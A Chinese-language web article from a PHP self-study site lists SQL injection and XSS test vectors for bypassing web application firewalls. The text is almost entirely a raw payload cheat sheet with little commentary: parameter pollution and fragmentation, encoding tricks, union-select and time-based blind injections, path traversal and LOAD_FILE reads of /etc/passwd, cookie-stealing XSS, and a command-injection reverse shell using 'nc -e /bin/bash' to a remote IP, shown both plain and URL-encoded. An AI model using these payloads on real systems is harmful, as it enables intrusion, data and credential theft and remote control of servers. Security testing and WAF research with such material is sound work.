SQL注入和XSS BYPASS WAF 测试向量 - 网站安全

SQL注入和XSS BYPASS WAF 测试向量 - 网站安全 - 自学

来源：自学PHP网时间：2015-04-16 23:15 作者：阅读:次

[导读] www site com...

1. 识别脆弱点

http://www.site.com.tr/uyg.asp?id=123'+union+selec+1,2,3--
http://www.site.com.tr/uyg.asp?id=123'
http://www.site.com.tr/uyg.asp?id=123<12("/>

2. HTTP参数污染(HPP)

http://www.site.com.tr/uyg.asp?id=123&id=456
http://www.site.com.tr/uyg.asp?id=123+select+1,2,3+from+table 
http://www.site.com.tr/uyg.asp?id=123+select+1&id=2,3+from+table
http://www.site.com.tr/uyg.asp?id=select/&id=/user&id=pass/&id=/from/*&id=*/users id=select/*,*/user,pass/*,*/from/*,*/users

3. HTTP参数碎片(HPF)
uyg.asp?brandid=123+union/*&prodid=*/select+user,pass/*&price=*/from users--
select * from table1.markt where brand=123 union/* and prodid=*/select username,pass/*order by*/from users--

4. 编码

URL Encode - %27
Double URL Encode - %2527
UTF-8 (2 byte) - %c0%a7
UTF-8 (JAVA) - \uc0a7
HTML Entity - '
HTML Entity Number - 
Decimal - '
Unicode URL Encoding - %u0027
Base64 - Jw==

uyg.asp?id=<script>alert(1)</script>

uyg.asp?id=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
uyg.asp?id=%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2531%2529%253c%252f%2573%2563%2572%2569%2570%2574%253e
uyg.asp?id=%3cscript%3ealert(1)%3c%2fscript%3c
uyg.asp?id=%3cscript%3ealert(1)%3c/script%3c
uyg.asp?id=%3cscript%3ealert%281%29%3c%2fscript%3c
uyg.asp?id=%%3c%2fsCrIpT%3e%3csCrIpT%3ealert(1)%3c%2fsCrIpT%3e
uyg.asp?id=%A2%BE%BCscript%BEalert(1)%BC/script%BE
uyg.asp?id=<a href="javascript#alert(1);">
uyg.asp?id=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
uyg.asp?id=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
uyg.asp?id=0;data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg=="+http-equiv="refresh" "

uyg.asp?id=123 or '1'='1

uyg.asp?id=123%20or%20%271%27=%271
uyg.asp?id=123%20or%20%c0%a7%c01%a71=%c0%a71
uyg.asp?id=123%2527%2520select%2520convert(int,@@servername)--
uyg.asp?id=123K29yKycxJz0nMQ==

uyg.asp?id=123;nc -e /bin/bash 192.168.1.3 12345;

uyg.asp?id=%61%3b%6e%63%20%2d%65%20%2f%62%69%6e%2f%62%61%73%68%20%31%39%32%2e%31%36%38%2e%31%2e%33%20%31%32%33%34%35%3b

5. Script标签

uyg.asp?id="+onmouseover="window.location='http://www.site.com.tr/code.js'
uyg.asp?id="+style%3d"x%3aexpression(alert(1))+
uyg.asp?id="+onkeypress="alert(23)"+"
uyg.asp?id=123); alert(document.cookie);//
uyg.asp?id=javascript：alert(1)
uyg.asp?id=alert(document.cookie)
uyg.asp?id=alert(document['cookie'])
uyg.asp?id=with(document)alert(cookie)
uyg.asp?id=";location=location.hash)//#0={};alert(0)
uyg.asp?id=//";alert(String.fromCharCode(88,83,83))
uyg.asp?id=%F6%3Cimg+onmouseover=prompt(/test/)//%F6%3E
uyg.asp?id=%'});%0aalert(1);%20//
uyg.asp?id=%";eval(unescape(location))//#%0Aalert(0)
uyg.asp?id=0;url=javascript：alert(1)" http-equiv="refresh" "
uyg.asp?id=onError="javascript：decipher(document.forms.cipher); alert(document.forms.cipher.stream.value); document.forms.cipher.stream.value = document.forms.cipher.stream_copy.value;

uyg.php?id=<script>String.fromCharCode(61)</script>
uyg.php?id=10+UNION+SELECT+LOAD_FILE(0x2f6574632f706173737764) 
uyg.asp?id=if(substring(USER(),1,4)=0x726f6f74,SLEEP(5),1)

6. 跨站脚本

uyg.asp?id=<img/src="xss.png"alt="xss">
uyg.asp?id=<object data="javascript：alert(1)">
uyg.asp?id=<object><param name="src" value="javascript：alert(1)"></param></object>
uyg.asp?id=<isindex type=image src=1 onerror=alert(1)>
uyg.asp?id=<isindex action=javascript：alert(1) type=image>
uyg.asp?id=<img src=x:alert(alt) onerror=eval(src) alt=0>
uyg.asp?id=<meta style="xss:expression(open(alert(1)))" />
uyg.asp?id=<!</textarea <body

uyg.asp?id=123+1-1 (id=123)
uyg.asp?id=123+1 (id=124)
uyg.asp?id=123+len(1234)-len(123) (id=124)
uyg.asp?id=123+len(@@server)-len(@@server)

uyg.php?id=1+union+select+1,2,3/* 
uyg.php?id=1/*union*/union/*select*/select+1,2,3/* 
uyg.php?id=1%2520union%2520select%25201,2,3/* 
uyg.php?id=1%0Aunion%0Aselect%0A1,2,3/* 
uyg.php?id=1/**/union%a0select/**/1,pass,3`a`from`users`
uyg.php?id=(0)union(select(table_schema),table_name,(0)from(information_schema.tables)having((table_schema)like(0x74657374)&&(table_name)!=(0x7573657273)))#

uyg.php?id=union(select(version()))--

uyg.php?id=123/*! union all select version() */-- 
uyg.php?id=123/*!or*/1=1;

uyg.php?id=1+union+select+1,2,3/* 
uyg.php?id=1+union+select+1,2,3-- 
uyg.php?id=1+union+select+1,2,3# 
uyg.php?id=1+union+select+1,2,3;%00

uyg.php?id=%3Cscript%3Ealert(document.cookie)%3C/script%00TESTTEST%3E 
uyg.php?id=%3Cscript%3Ealert(document.cookie)%3C/script%20TESTTEST%3E 
uyg.php?id=";eval(unescape(location))//#%0Aalert(0) 
uyg.php?file=../../../../../etc/passwd/////[…]///// 
uyg.php?file=../../../../../etc/passwd////////////// 
uyg.php?file=.//././/././/./boot.ini uyg.php?id%00TESTTEST=1+union+select+1,2,3 
uyg.php?id%20TESTTEST=1+union+select+1,2,3 
uyg.php?id=1234&"><script>alert(1)</script>=1234 
uyg.php?id=%00><script>alert(123)</script>

9. URL重写
http://localhost/uyg/id/123+or+1=1/tp/456

知其然，更要知其所以然

某交易网APP设计不当导致数据库泄漏 - 网站安全

检测php网站是否已经被攻破的方法 - 网站安全

子栏目

SQL注入和XSS BYPASS WAF 测试向量 - 网站安全 - 自学

最新评论

添加评论

更多文章推荐

添加评论